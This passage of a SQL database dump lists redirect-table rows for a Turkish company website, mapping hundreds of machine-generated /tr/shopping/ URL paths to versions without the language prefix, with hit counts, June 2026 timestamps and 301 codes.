00:00:00',301),(77654,'https://3s-technologies.com.tr/tr/shopping/transforate/594463290.html',NULL,'https://3s-technologies.com.tr/shopping/transforate/594463290.html','',1,0,'2026-06-11 10:18:02','0000-00-00 00:00:00',301),(77655,'https://3s-technologies.com.tr/tr/shopping/spongiform/979748393.html',NULL,'https://3s-technologies.com.tr/shopping/spongiform/979748393.html','',1,0,'2026-06-11 10:18:04','0000-00-00 00:00:00',301),(77656,'https://3s-technologies.com.tr/tr/shopping/selfaddressed/1385134251.html',NULL,'https://3s-technologies.com.tr/shopping/selfaddressed/1385134251.html','',1,0,'2026-06-11 10:18:07','0000-00-00 00:00:00',301),(77657,'https://3s-technologies.com.tr/tr/shopping/radiolus/2364044034.html',NULL,'https://3s-technologies.com.tr/shopping/radiolus/2364044034.html','',1,0,'2026-06-11 10:18:11','0000-00-00 00:00:00',301),(77658,'https://3s-technologies.com.tr/tr/shopping/pinnula/41995954.html',NULL,'https://3s-technologies.com.tr/shopping/pinnula/41995954.html','',1,0,'2026-06-11 10:18:13','0000-00-00 00:00:00',301),(77659,'https://3s-technologies.com.tr/tr/shopping/synoicus/1877848852.html',NULL,'https://3s-technologies.com.tr/shopping/synoicus/1877848852.html','',1,0,'2026-06-11 10:18:16','0000-00-00 00:00:00',301),(77660,'https://3s-technologies.com.tr/tr/shopping/cerium/120099427.html',NULL,'https://3s-technologies.com.tr/shopping/cerium/120099427.html','',1,0,'2026-06-11 10:18:22','0000-00-00 00:00:00',301),(77661,'https://3s-technologies.com.tr/tr/shopping/protopope/512137908.html',NULL,'https://3s-technologies.com.tr/shopping/protopope/512137908.html','',1,0,'2026-06-11 10:18:24','0000-00-00 00:00:00',301),(77662,'https://3s-technologies.com.tr/tr/shopping/coccolite/1458812475.html',NULL,'https://3s-technologies.com.tr/shopping/coccolite/1458812475.html','',1,0,'2026-06-11 10:18:27','0000-00-00 00:00:00',301),(77663,'https://3s-technologies.com.tr/tr/shopping/justified/2202966614.html',NULL,'https://3s-technologies.com.tr/shopping/justified/2202966614.html','',1,0,'2026-06-11 10:18:30','0000-00-00 00:00:00',301),(77664,'https://3s-technologies.com.tr/tr/shopping/incavation/1266056294.html',NULL,'https://3s-technologies.com.tr/shopping/incavation/1266056294.html','',1,0,'2026-06-11 10:18:33','0000-00-00 00:00:00',301),(77665,'https://3s-technologies.com.tr/tr/shopping/trilled/4258994927.html',NULL,'https://3s-technologies.com.tr/shopping/trilled/4258994927.html','',1,0,'2026-06-11 10:18:36','0000-00-00 00:00:00',301),(77666,'https://3s-technologies.com.tr/tr/shopping/spitball/25689460.html',NULL,'https://3s-technologies.com.tr/shopping/spitball/25689460.html','',1,0,'2026-06-11 10:18:39','0000-00-00 00:00:00',301),(77667,'https://3s-technologies.com.tr/tr/shopping/synodist/172839176.html',NULL,'https://3s-technologies.com.tr/shopping/synodist/172839176.html','',1,0,'2026-06-11 10:18:43','0000-00-00 00:00:00',301),(77668,'https://3s-technologies.com.tr/tr/shopping/serpentigenous/4081211413.html',NULL,'https://3s-technologies.com.tr/shopping/serpentigenous/4081211413.html','',1,0,'2026-06-11 10:18:48','0000-00-00 00:00:00',301),(77669,'https://3s-technologies.com.tr/tr/shopping/bradykinin/487580734.html',NULL,'https://3s-technologies.com.tr/shopping/bradykinin/487580734.html','',1,0,'2026-06-11 10:18:50','0000-00-00 00:00:00',301),(77670,'https://3s-technologies.com.tr/tr/shopping/underkind/2475805458.html',NULL,'https://3s-technologies.com.tr/shopping/underkind/2475805458.html','',1,0,'2026-06-11 10:18:53','0000-00-00 00:00:00',301),(77671,'https://3s-technologies.com.tr/tr/shopping/broadcloth/1102158689.html',NULL,'https://3s-technologies.com.tr/shopping/broadcloth/1102158689.html','',1,0,'2026-06-11 10:18:56','0000-00-00 00:00:00',301),(77672,'https://3s-technologies.com.tr/tr/shopping/amphoric/48887228.html',NULL,'https://3s-technologies.com.tr/shopping/amphoric/48887228.html','',1,0,'2026-06-11 10:18:59','0000-00-00 00:00:00',301),(77673,'https://3s-technologies.com.tr/tr/shopping/jalons/1996016129.html',NULL,'https://3s-technologies.com.tr/shopping/jalons/1996016129.html','',1,0,'2026-06-11 10:19:02','0000-00-00 00:00:00',301),(77674,'https://3s-technologies.com.tr/tr/shopping/excreable/2185144506.html',NULL,'https://3s-technologies.com.tr/shopping/excreable/2185144506.html','',1,0,'2026-06-11 10:19:05','0000-00-00 00:00:00',301),(77675,'https://3s-technologies.com.tr/tr/shopping/varsity/3089187838.html',NULL,'https://3s-technologies.com.tr/shopping/varsity/3089187838.html','',1,0,'2026-06-11 10:19:08','0000-00-00 00:00:00',301),(77676,'https://3s-technologies.com.tr/tr/shopping/extinguish/2491860844.html',NULL,'https://3s-technologies.com.tr/shopping/extinguish/2491860844.html','',1,0,'2026-06-11 10:19:17','0000-00-00 00:00:00',301),(77677,'https://3s-technologies.com.tr/tr/shopping/arousing/847407837.html',NULL,'https://3s-technologies.com.tr/shopping/arousing/847407837.html','',1,0,'2026-06-11 10:19:20','0000-00-00 00:00:00',301),(77678,'https://3s-technologies.com.tr/tr/shopping/amaranth/4062420630.html',NULL,'https://3s-technologies.com.tr/shopping/amaranth/4062420630.html','',1,0,'2026-06-11 10:19:23','0000-00-00 00:00:00',301),(77679,'https://3s-technologies.com.tr/tr/shopping/prebendship/3396512717.html',NULL,'https://3s-technologies.com.tr/shopping/prebendship/3396512717.html','',1,0,'2026-06-11 10:19:26','0000-00-00 00:00:00',301),(77680,'https://3s-technologies.com.tr/tr/shopping/portionist/3378872428.html',NULL,'https://3s-technologies.com.tr/shopping/portionist/3378872428.html','',1,0,'2026-06-11 10:19:29','0000-00-00 00:00:00',301),(77681,'https://3s-technologies.com.tr/tr/shopping/dossil/265429895.html',NULL,'https://3s-technologies.com.tr/shopping/dossil/265429895.html','',1,0,'2026-06-11 10:19:32','0000-00-00 00:00:00',301),(77682,'https://3s-technologies.com.tr/tr/shopping/caudex/3343228125.html',NULL,'https://3s-technologies.com.tr/shopping/caudex/3343228125.html','',1,0,'2026-06-11 10:19:37','0000-00-00 00:00:00',301),(77683,'https://3s-technologies.com.tr/tr/shopping/repriefe/2054076231.html',NULL,'https://3s-technologies.com.tr/shopping/repriefe/2054076231.html','',1,0,'2026-06-11 10:19:39','0000-00-00 00:00:00',301),(77684,'https://3s-technologies.com.tr/tr/shopping/beethoven/187378932.html',NULL,'https://3s-technologies.com.tr/shopping/beethoven/187378932.html','',1,0,'2026-06-11 10:19:42','0000-00-00 00:00:00',301),(77685,'https://3s-technologies.com.tr/tr/shopping/fleered/2670985821.html',NULL,'https://3s-technologies.com.tr/shopping/fleered/2670985821.html','',1,0,'2026-06-11 10:19:44','0000-00-00 00:00:00',301),(77686,'https://3s-technologies.com.tr/tr/shopping/swage/1166072683.html',NULL,'https://3s-technologies.com.tr/shopping/swage/1166072683.html','',1,0,'2026-06-11 10:19:48','0000-00-00 00:00:00',301),(77687,'https://3s-technologies.com.tr/tr/shopping/dipnoi/3694628066.html',NULL,'https://3s-technologies.com.tr/shopping/dipnoi/3694628066.html','',1,0,'2026-06-11 10:19:52','0000-00-00 00:00:00',301),(77688,'https://3s-technologies.com.tr/tr/shopping/conterminant/1356229949.html',NULL,'https://3s-technologies.com.tr/shopping/conterminant/1356229949.html','',1,0,'2026-06-11 10:19:57','0000-00-00 00:00:00',301),(77689,'https://3s-technologies.com.tr/tr/shopping/pseudocumene/517336565.html',NULL,'https://3s-technologies.com.tr/shopping/pseudocumene/517336565.html','',1,0,'2026-06-11 10:20:00','0000-00-00 00:00:00',301),(77690,'https://3s-technologies.com.tr/tr/shopping/extruded/3162564627.html',NULL,'https://3s-technologies.com.tr/shopping/extruded/3162564627.html','',1,0,'2026-06-11 10:20:09','0000-00-00 00:00:00',301),(77691,'https://3s-technologies.com.tr/tr/shopping/dekagram/1949031843.html',NULL,'https://3s-technologies.com.tr/shopping/dekagram/1949031843.html','',1,0,'2026-06-11 10:20:12','0000-00-00 00:00:00',301),(77692,'https://3s-technologies.com.tr/tr/shopping/analis/3367444892.html',NULL,'https://3s-technologies.com.tr/shopping/analis/3367444892.html','',1,0,'2026-06-11 10:20:15','0000-00-00 00:00:00',301),(77693,'https://3s-technologies.com.tr/tr/shopping/orchotomy/3592645555.html',NULL,'https://3s-technologies.com.tr/shopping/orchotomy/3592645555.html','',1,0,'2026-06-11 10:20:18','0000-00-00 00:00:00',301),(77694,'https://3s-technologies.com.tr/tr/shopping/increscent/4192656735.html',NULL,'https://3s-technologies.com.tr/shopping/increscent/4192656735.html','',1,0,'2026-06-11 10:20:21','0000-00-00 00:00:00',301),(77695,'https://3s-technologies.com.tr/tr/shopping/tenotome/2829108609.html',NULL,'https://3s-technologies.com.tr/shopping/tenotome/2829108609.html','',1,0,'2026-06-11 10:20:24','0000-00-00 00:00:00',301),(77696,'https://3s-technologies.com.tr/tr/shopping/monamide/1938037234.html',NULL,'https://3s-technologies.com.tr/shopping/monamide/1938037234.html','',1,0,'2026-06-11 10:20:27','0000-00-00 00:00:00',301),(77697,'https://3s-technologies.com.tr/tr/shopping/scariose/866658093.html',NULL,'https://3s-technologies.com.tr/shopping/scariose/866658093.html','',1,0,'2026-06-11 10:20:30','0000-00-00 00:00:00',301),(77698,'https://3s-technologies.com.tr/tr/shopping/mnium/2449283527.html',NULL,'https://3s-technologies.com.tr/shopping/mnium/2449283527.html','',1,0,'2026-06-11 10:20:35','0000-00-00 00:00:00',301),(77699,'https://3s-technologies.com.tr/tr/shopping/salutarily/333843362.html',NULL,'https://3s-technologies.com.tr/shopping/salutarily/333843362.html','',1,0,'2026-06-11 10:20:37','0000-00-00 00:00:00',301),(77700,'https://3s-technologies.com.tr/tr/shopping/hogan/1616771740.html',NULL,'https://3s-technologies.com.tr/shopping/hogan/1616771740.html','',1,0,'2026-06-11 10:20:40','0000-00-00 00:00:00',301),(77701,'https://3s-technologies.com.tr/tr/shopping/combings/1465349746.html',NULL,'https://3s-technologies.com.tr/shopping/combings/1465349746.html','',1,0,'2026-06-11 10:20:43','0000-00-00 00:00:00',301),(77702,'https://3s-technologies.com.tr/tr/shopping/snakefish/1096072551.html',NULL,'https://3s-technologies.com.tr/shopping/snakefish/1096072551.html','',1,0,'2026-06-11 10:20:46','0000-00-00 00:00:00',301),(77703,'https://3s-technologies.com.tr/tr/shopping/dimensions/2078127160.html',NULL,'https://3s-technologies.com.tr/shopping/dimensions/2078127160.html','',1,0,'2026-06-11 10:20:49','0000-00-00 00:00:00',301),(77704,'https://3s-technologies.com.tr/tr/shopping/intra/4290227268.html',NULL,'https://3s-technologies.com.tr/shopping/intra/4290227268.html','',1,0,'2026-06-11 10:20:52','0000-00-00 00:00:00',301),(77705,'https://3s-technologies.com.tr/tr/shopping/thriftiest/2016596583.html',NULL,'https://3s-technologies.com.tr/shopping/thriftiest/2016596583.html','',1,0,'2026-06-11 10:20:55','0000-00-00 00:00:00',301),(77706,'https://3s-technologies.com.tr/tr/shopping/venturesomely/2234127660.html',NULL,'https://3s-technologies.com.tr/shopping/venturesomely/2234127660.html','',1,0,'2026-06-11 10:21:01','0000-00-00 00:00:00',301),(77707,'https://3s-technologies.com.tr/tr/shopping/peris/1408936937.html',NULL,'https://3s-technologies.com.tr/shopping/peris/1408936937.html','',1,0,'2026-06-11 10:21:03','0000-00-00 00:00:00',301),(77708,'https://3s-technologies.com.tr/tr/shopping/parnassian/3618734575.html',NULL,'https://3s-technologies.com.tr/shopping/parnassian/3618734575.html','',1,0,'2026-06-11 10:21:06','0000-00-00 00:00:00',301),(77709,'https://3s-technologies.com.tr/tr/shopping/ajava/3065430544.html',NULL,'https://3s-technologies.com.tr/shopping/ajava/3065430544.html','',1,0,'2026-06-11 10:21:09','0000-00-00 00:00:00',301),(77710,'https://3s-technologies.com.tr/tr/shopping/expositive/3057644108.html',NULL,'https://3s-technologies.com.tr/shopping/expositive/3057644108.html','',1,0,'2026-06-11 10:21:12','0000-00-00 00:00:00',301),(77711,'https://3s-technologies.com.tr/tr/shopping/sagene/2869493799.html',NULL,'https://3s-technologies.com.tr/shopping/sagene/2869493799.html','',1,0,'2026-06-11 10:21:15','0000-00-00 00:00:00',301),(77712,'https://3s-technologies.com.tr/tr/shopping/unilobar/613980751.html',NULL,'https://3s-technologies.com.tr/shopping/unilobar/613980751.html','',1,0,'2026-06-11 10:21:18','0000-00-00 00:00:00',301),(77713,'https://3s-technologies.com.tr/tr/shopping/nonepiscopal/3831646291.html',NULL,'https://3s-technologies.com.tr/shopping/nonepiscopal/3831646291.html','',1,0,'2026-06-11 10:21:21','0000-00-00 00:00:00',301),(77714,'https://3s-technologies.com.tr/tr/shopping/hetaristic/1219072024.html',NULL,'https://3s-technologies.com.tr/shopping/hetaristic/1219072024.html','',1,0,'2026-06-11 10:21:34','0000-00-00 00:00:00',301),(77715,'https://3s-technologies.com.tr/tr/shopping/finger/3768564824.html',NULL,'https://3s-technologies.com.tr/shopping/finger/3768564824.html','',1,0,'2026-06-11 10:21:36','0000-00-00 00:00:00',301),(77716,'https://3s-technologies.com.tr/tr/shopping/silentness/2772690752.html',NULL,'https://3s-technologies.com.tr/shopping/silentness/2772690752.html','',1,0,'2026-06-11 10:21:39','0000-00-00 00:00:00',301),(77717,'https://3s-technologies.com.tr/tr/shopping/calcinate/26779847.html',NULL,'https://3s-technologies.com.tr/shopping/calcinate/26779847.html','',1,0,'2026-06-11 10:21:42','0000-00-00 00:00:00',301),(77718,'https://3s-technologies.com.tr/tr/shopping/hemicycle/320593858.html',NULL,'https://3s-technologies.com.tr/shopping/hemicycle/320593858.html','',1,0,'2026-06-11 10:21:45','0000-00-00 00:00:00',301),(77719,'https://3s-technologies.com.tr/tr/shopping/introversive/3914351041.html',NULL,'https://3s-technologies.com.tr/shopping/introversive/3914351041.html','',1,0,'2026-06-11 10:21:48','0000-00-00 00:00:00',301),(77720,'https://3s-technologies.com.tr/tr/shopping/tainted/3609349917.html',NULL,'https://3s-technologies.com.tr/shopping/tainted/3609349917.html','',1,0,'2026-06-11 10:21:51','0000-00-00 00:00:00',301),(77721,'https://3s-technologies.com.tr/tr/shopping/inaction/2373169026.html',NULL,'https://3s-technologies.com.tr/shopping/inaction/2373169026.html','',1,0,'2026-06-11 10:21:54','0000-00-00 00:00:00',301),(77722,'https://3s-technologies.com.tr/tr/shopping/lobotomy/1128089089.html',NULL,'https://3s-technologies.com.tr/shopping/lobotomy/1128089089.html','',1,0,'2026-06-11 10:22:00','0000-00-00 00:00:00',301),(77723,'https://3s-technologies.com.tr/tr/shopping/appeasableness/2276601295.html',NULL,'https://3s-technologies.com.tr/shopping/appeasableness/2276601295.html','',1,0,'2026-06-11 10:22:02','0000-00-00 00:00:00',301),(77724,'https://3s-technologies.com.tr/tr/shopping/boxberry/4123005542.html',NULL,'https://3s-technologies.com.tr/shopping/boxberry/4123005542.html','',1,0,'2026-06-11 10:22:05','0000-00-00 00:00:00',301),(77725,'https://3s-technologies.com.tr/tr/shopping/spewed/1382969661.html',NULL,'https://3s-technologies.com.tr/shopping/spewed/1382969661.html','',1,0,'2026-06-11 10:22:08','0000-00-00 00:00:00',301),(77726,'https://3s-technologies.com.tr/tr/shopping/parcener/2967480365.html',NULL,'https://3s-technologies.com.tr/shopping/parcener/2967480365.html','',1,0,'2026-06-11 10:22:11','0000-00-00 00:00:00',301),(77727,'https://3s-technologies.com.tr/tr/shopping/cantar/1339311403.html',NULL,'https://3s-technologies.com.tr/shopping/cantar/1339311403.html','',1,0,'2026-06-11 10:22:14','0000-00-00 00:00:00',301),(77728,'https://3s-technologies.com.tr/tr/shopping/highbrow/1338099288.html',NULL,'https://3s-technologies.com.tr/shopping/highbrow/1338099288.html','',1,0,'2026-06-11 10:22:18','0000-00-00 00:00:00',301),(77729,'https://3s-technologies.com.tr/tr/shopping/distinctiveness/3258099150.html',NULL,'https://3s-technologies.com.tr/shopping/distinctiveness/3258099150.html','',1,0,'2026-06-11 10:22:24','0000-00-00 00:00:00',301),(77730,'https://3s-technologies.com.tr/tr/shopping/mourner/2362710223.html',NULL,'https://3s-technologies.com.tr/shopping/mourner/2362710223.html','',1,0,'2026-06-11 10:22:27','0000-00-00 00:00:00',301),(77731,'https://3s-technologies.com.tr/tr/shopping/oleone/1233274019.html',NULL,'https://3s-technologies.com.tr/shopping/oleone/1233274019.html','',1,0,'2026-06-11 10:22:30','0000-00-00 00:00:00',301),(77732,'https://3s-technologies.com.tr/tr/shopping/flurry/3885427498.html',NULL,'https://3s-technologies.com.tr/shopping/flurry/3885427498.html','',1,0,'2026-06-11 10:22:33','0000-00-00 00:00:00',301),(77733,'https://3s-technologies.com.tr/tr/shopping/physophorae/3455885514.html',NULL,'https://3s-technologies.com.tr/shopping/physophorae/3455885514.html','',1,0,'2026-06-11 10:22:36','0000-00-00 00:00:00',301),(77734,'https://3s-technologies.com.tr/tr/shopping/wigged/3211809572.html',NULL,'https://3s-technologies.com.tr/shopping/wigged/3211809572.html','',1,0,'2026-06-11 10:22:39','0000-00-00 00:00:00',301),(77735,'https://3s-technologies.com.tr/tr/shopping/perigynium/3926618015.html',NULL,'https://3s-technologies.com.tr/shopping/perigynium/3926618015.html','',1,0,'2026-06-11 10:22:42','0000-00-00 00:00:00',301),(77736,'https://3s-technologies.com.tr/tr/shopping/baronage/2543477445.html',NULL,'https://3s-technologies.com.tr/shopping/baronage/2543477445.html','',1,0,'2026-06-11 10:22:46','0000-00-00 00:00:00',301),(77737,'https://3s-technologies.com.tr/tr/shopping/miseries/1884979969.html',NULL,'https://3s-technologies.com.tr/shopping/miseries/1884979969.html','',1,0,'2026-06-11 10:22:49','0000-00-00 00:00:00',301),(77738,'https://3s-technologies.com.tr/tr/shopping/euphorbin/1023369309.html',NULL,'https://3s-technologies.com.tr/shopping/euphorbin/1023369309.html','',1,0,'2026-06-11 10:22:58','0000-00-00 00:00:00',301),(77739,'https://3s-technologies.com.tr/tr/shopping/chirper/615812090.html',NULL,'https://3s-technologies.com.tr/shopping/chirper/615812090.html','',1,0,'2026-06-11 10:23:01','0000-00-00 00:00:00',301),(77740,'https://3s-technologies.com.tr/tr/shopping/peaflower/2386151383.html',NULL,'https://3s-technologies.com.tr/shopping/peaflower/2386151383.html','',1,0,'2026-06-11 10:23:04','0000-00-00 00:00:00',301),(77741,'https://3s-technologies.com.tr/tr/shopping/geometries/675109092.html',NULL,'https://3s-technologies.com.tr/shopping/geometries/675109092.html','',1,0,'2026-06-11 10:23:07','0000-00-00 00:00:00',301),(77742,'https://3s-technologies.com.tr/tr/shopping/attitudes/3984985795.html',NULL,'https://3s-technologies.com.tr/shopping/attitudes/3984985795.html','',1,0,'2026-06-11 10:23:10','0000-00-00 00:00:00',301),(77743,'https://3s-technologies.com.tr/tr/shopping/closh/1917749117.html',NULL,'https://3s-technologies.com.tr/shopping/closh/1917749117.html','',1,0,'2026-06-11 10:23:13','0000-00-00 00:00:00',301),(77744,'https://3s-technologies.com.tr/tr/shopping/cortinaria/624533949.html',NULL,'https://3s-technologies.com.tr/shopping/cortinaria/624533949.html','',1,0,'2026-06-11 10:23:16','0000-00-00 00:00:00',301),(77745,'https://3s-technologies.com.tr/tr/shopping/stereometric/2181508225.html',NULL,'https://3s-technologies.com.tr/shopping/stereometric/2181508225.html','',1,0,'2026-06-11 10:23:55','0000-00-00 00:00:00',301),(77746,'https://3s-technologies.com.tr/tr/shopping/blenny/1097284650.html',NULL,'https://3s-technologies.com.tr/shopping/blenny/1097284650.html','',1,0,'2026-06-11 10:24:00','0000-00-00 00:00:00',301),(77747,'https://3s-technologies.com.tr/tr/shopping/impolicy/1051929283.html',NULL,'https://3s-technologies.com.tr/shopping/impolicy/1051929283.html','',1,0,'2026-06-11 10:24:03','0000-00-00 00:00:00',301),(77748,'https://3s-technologies.com.tr/tr/shopping/endangering/2381411195.html',NULL,'https://3s-technologies.com.tr/shopping/endangering/2381411195.html','',1,0,'2026-06-11 10:24:06','0000-00-00 00:00:00',301),(77749,'https://3s-technologies.com.tr/tr/shopping/toponymic/476702844.html',NULL,'https://3s-technologies.com.tr/shopping/toponymic/476702844.html','',1,0,'2026-06-11 10:24:09','0000-00-00 00:00:00',301),(77750,'https://3s-technologies.com.tr/tr/shopping/demijohn/640718715.html',NULL,'https://3s-technologies.com.tr/shopping/demijohn/640718715.html','',1,0,'2026-06-11 10:24:12','0000-00-00 00:00:00',301),(77751,'https://3s-technologies.com.tr/tr/shopping/cowshed/2310791823.html',NULL,'https://3s-technologies.com.tr/shopping/cowshed/2310791823.html','',1,0,'2026-06-11 10:24:15','0000-00-00 00:00:00',301),(77752,'https://3s-technologies.com.tr/tr/shopping/vestigate/1919246435.html',NULL,'https://3s-technologies.com.tr/shopping/vestigate/1919246435.html','',1,0,'2026-06-11 10:24:21','0000-00-00 00:00:00',301),(77753,'https://3s-technologies.com.tr/tr/shopping/deaconess/3330238213.html',NULL,'https://3s-technologies.com.tr/shopping/deaconess/3330238213.html','',1,0,'2026-06-11 10:24:24','0000-00-00 00:00:00',301),(77754,'https://3s-technologies.com.tr/tr/shopping/bodywork/1810082454.html',NULL,'https://3s-technologies.com.tr/shopping/bodywork/1810082454.html','',1,0,'2026-06-11 10:24:27','0000-00-00 00:00:00',301),(77755,'https://3s-technologies.com.tr/tr/shopping/brilliant/270111171.html',NULL,'https://3s-technologies.com.tr/shopping/brilliant/270111171.html','',1,0,'2026-06-11 10:24:30','0000-00-00 00:00:00',301),(77756,'https://3s-technologies.com.tr/tr/shopping/driftpin/2981573775.html',NULL,'https://3s-technologies.com.tr/shopping/driftpin/2981573775.html','',1,0,'2026-06-11 10:24:32','0000-00-00 00:00:00',301),(77757,'https://3s-technologies.com.tr/tr/shopping/freespokenness/1115755718.html',NULL,'https://3s-technologies.com.tr/shopping/freespokenness/1115755718.html','',1,0,'2026-06-11 10:24:36','0000-00-00 00:00:00',301),(77758,'https://3s-technologies.com.tr/tr/shopping/denticulately/3075508027.html',NULL,'https://3s-technologies.com.tr/shopping/denticulately/3075508027.html','',1,0,'2026-06-11 10:24:39','0000-00-00 00:00:00',301),(77759,'https://3s-technologies.com.tr/tr/shopping/bursch/1166999547.html',NULL,'https://3s-technologies.com.tr/shopping/bursch/1166999547.html','',1,0,'2026-06-11 10:24:45','0000-00-00 00:00:00',301),(77760,'https://3s-technologies.com.tr/tr/shopping/endoscope/2118755978.html',NULL,'https://3s-technologies.com.tr/shopping/endoscope/2118755978.html','',1,0,'2026-06-11 10:24:48','0000-00-00 00:00:00',301),(77761,'https://3s-technologies.com.tr/tr/shopping/quenching/782630683.html',NULL,'https://3s-technologies.com.tr/shopping/quenching/782630683.html','',1,0,'2026-06-11 10:24:51','0000-00-00 00:00:00',301),(77762,'https://3s-technologies.com.tr/tr/shopping/infrangible/4106529761.html',NULL,'https://3s-technologies.com.tr/shopping/infrangible/4106529761.html','',1,0,'2026-06-11 10:24:54','0000-00-00 00:00:00',301),(77763,'https://3s-technologies.com.tr/tr/shopping/coccoidea/121671174.html',NULL,'https://3s-technologies.com.tr/shopping/coccoidea/121671174.html','',1,0,'2026-06-11 10:24:57','0000-00-00 00:00:00',301),(77764,'https://3s-technologies.com.tr/tr/shopping/bilinearis/313555245.html',NULL,'https://3s-technologies.com.tr/shopping/bilinearis/313555245.html','',1,0,'2026-06-11 10:25:00','0000-00-00 00:00:00',301),(77765,'https://3s-technologies.com.tr/tr/shopping/roulade/1000492243.html',NULL,'https://3s-technologies.com.tr/shopping/roulade/1000492243.html','',1,0,'2026-06-11 10:25:03','0000-00-00 00:00:00',301),(77766,'https://3s-technologies.com.tr/tr/shopping/tepefied/1876636769.html',NULL,'https://3s-technologies.com.tr/shopping/tepefied/1876636769.html','',1,0,'2026-06-11 10:25:18','0000-00-00 00:00:00',301),(77767,'https://3s-technologies.com.tr/tr/shopping/interstapedial/2278809428.html',NULL,'https://3s-technologies.com.tr/shopping/interstapedial/2278809428.html','',1,0,'2026-06-11 10:25:21','0000-00-00 00:00:00',301),(77768,'https://3s-technologies.com.tr/tr/shopping/finnikin/930385333.html',NULL,'https://3s-technologies.com.tr/shopping/finnikin/930385333.html','',1,0,'2026-06-11 10:25:24','0000-00-00 00:00:00',301),(77769,'https://3s-technologies.com.tr/tr/shopping/deathward/2109626009.html',NULL,'https://3s-technologies.com.tr/shopping/deathward/2109626009.html','',1,0,'2026-06-11 10:25:27','0000-00-00 00:00:00',301),(77770,'https://3s-technologies.com.tr/tr/shopping/kenya/4035560954.html',NULL,'https://3s-technologies.com.tr/shopping/kenya/4035560954.html','',1,0,'2026-06-11 10:25:30','0000-00-00 00:00:00',301),(77771,'https://3s-technologies.com.tr/tr/shopping/geusdism/10153654.html',NULL,'https://3s-technologies.com.tr/shopping/geusdism/10153654.html','',1,0,'2026-06-11 10:25:33','0000-00-00 00:00:00',301),(77772,'https://3s-technologies.com.tr/tr/shopping/regreet/3575126994.html',NULL,'https://3s-technologies.com.tr/shopping/regreet/3575126994.html','',1,0,'2026-06-11 10:25:36','0000-00-00 00:00:00',301),(77773,'https://3s-technologies.com.tr/tr/shopping/guerdonless/3074621812.html',NULL,'https://3s-technologies.com.tr/shopping/guerdonless/3074621812.html','',1,0,'2026-06-11 10:25:39','0000-00-00 00:00:00',301),(77774,'https://3s-technologies.com.tr/tr/shopping/proximally/482991930.html',NULL,'https://3s-technologies.com.tr/shopping/proximally/482991930.html','',1,0,'2026-06-11 10:25:42','0000-00-00 00:00:00',301),(77775,'https://3s-technologies.com.tr/tr/shopping/blender/189465369.html',NULL,'https://3s-technologies.com.tr/shopping/blender/189465369.html','',1,0,'2026-06-11 10:25:45','0000-00-00 00:00:00',301),(77776,'https://3s-technologies.com.tr/tr/shopping/heterodoxal/3670708571.html',NULL,'https://3s-technologies.com.tr/shopping/heterodoxal/3670708571.html','',1,0,'2026-06-11 10:25:48','0000-00-00 00:00:00',301),(77777,'https://3s-technologies.com.tr/tr/shopping/didacticism/1912689198.html',NULL,'https://3s-technologies.com.tr/shopping/didacticism/1912689198.html','',1,0,'2026-06-11 10:25:51','0000-00-00 00:00:00',301),(77778,'https://3s-technologies.com.tr/tr/shopping/maked/2333757268.html',NULL,'https://3s-technologies.com.tr/shopping/maked/2333757268.html','',1,0,'2026-06-11 10:25:54','0000-00-00 00:00:00',301),(77779,'https://3s-technologies.com.tr/tr/shopping/disconnect/4289015185.html',NULL,'https://3s-technologies.com.tr/shopping/disconnect/4289015185.html','',1,0,'2026-06-11 10:25:57','0000-00-00 00:00:00',301),(77780,'https://3s-technologies.com.tr/tr/shopping/melainotype/341323386.html',NULL,'https://3s-technologies.com.tr/shopping/melainotype/341323386.html','',1,0,'2026-06-11 10:26:04','0000-00-00 00:00:00',301),(77781,'https://3s-technologies.com.tr/tr/shopping/hypophosphate/201697720.html',NULL,'https://3s-technologies.com.tr/shopping/hypophosphate/201697720.html','',1,0,'2026-06-11 10:26:06','0000-00-00 00:00:00',301),(77782,'https://3s-technologies.com.tr/tr/shopping/infestans/71903074.html',NULL,'https://3s-technologies.com.tr/shopping/infestans/71903074.html','',1,0,'2026-06-11 10:26:09','0000-00-00 00:00:00',301),(77783,'https://3s-technologies.com.tr/tr/shopping/scaphism/2455802576.html',NULL,'https://3s-technologies.com.tr/shopping/scaphism/2455802576.html','',1,0,'2026-06-11 10:26:12','0000-00-00 00:00:00',301),(77784,'https://3s-technologies.com.tr/tr/shopping/withal/3454673415.html',NULL,'https://3s-technologies.com.tr/shopping/withal/3454673415.html','',1,0,'2026-06-11 10:26:15','0000-00-00 00:00:00',301),(77785,'https://3s-technologies.com.tr/tr/shopping/dicaeidae/670306104.html',NULL,'https://3s-technologies.com.tr/shopping/dicaeidae/670306104.html','',1,0,'2026-06-11 10:26:18','0000-00-00 00:00:00',301),(77786,'https://3s-technologies.com.tr/tr/shopping/agastache/2707564643.html',NULL,'https://3s-technologies.com.tr/shopping/agastache/2707564643.html','',1,0,'2026-06-11 10:26:21','0000-00-00 00:00:00',301),(77787,'https://3s-technologies.com.tr/tr/shopping/countenanced/3664557423.html',NULL,'https://3s-technologies.com.tr/shopping/countenanced/3664557423.html','',1,0,'2026-06-11 10:26:24','0000-00-00 00:00:00',301),(77788,'https://3s-technologies.com.tr/tr/shopping/muckmidden/3847784327.html',NULL,'https://3s-technologies.com.tr/shopping/muckmidden/3847784327.html','',1,0,'2026-06-11 10:26:27','0000-00-00 00:00:00',301),(77789,'https://3s-technologies.com.tr/tr/shopping/thickness/3890016302.html',NULL,'https://3s-technologies.com.tr/shopping/thickness/3890016302.html','',1,0,'2026-06-11 10:26:32','0000-00-00 00:00:00',301),(77790,'https://3s-technologies.com.tr/tr/shopping/correspondencies/3173117841.html',NULL,'https://3s-technologies.com.tr/shopping/correspondencies/3173117841.html','',1,0,'2026-06-11 10:26:36','0000-00-00 00:00:00',301),(77791,'https://3s-technologies.com.tr/tr/shopping/campagna/2433531672.html',NULL,'https://3s-technologies.com.tr/shopping/campagna/2433531672.html','',1,0,'2026-06-11 10:26:40','0000-00-00 00:00:00',301),(77792,'https://3s-technologies.com.tr/tr/shopping/boeuf/690644914.html',NULL,'https://3s-technologies.com.tr/shopping/boeuf/690644914.html','',1,0,'2026-06-11 10:26:43','0000-00-00 00:00:00',301),(77793,'https://3s-technologies.com.tr/tr/shopping/slant/2074966594.html',NULL,'https://3s-technologies.com.tr/shopping/slant/2074966594.html','',1,0,'2026-06-11 10:26:46','0000-00-00 00:00:00',301),(77794,'https://3s-technologies.com.tr/tr/shopping/constituter/2622911164.html',NULL,'https://3s-technologies.com.tr/shopping/constituter/2622911164.html','',1,0,'2026-06-11 10:26:49','0000-00-00 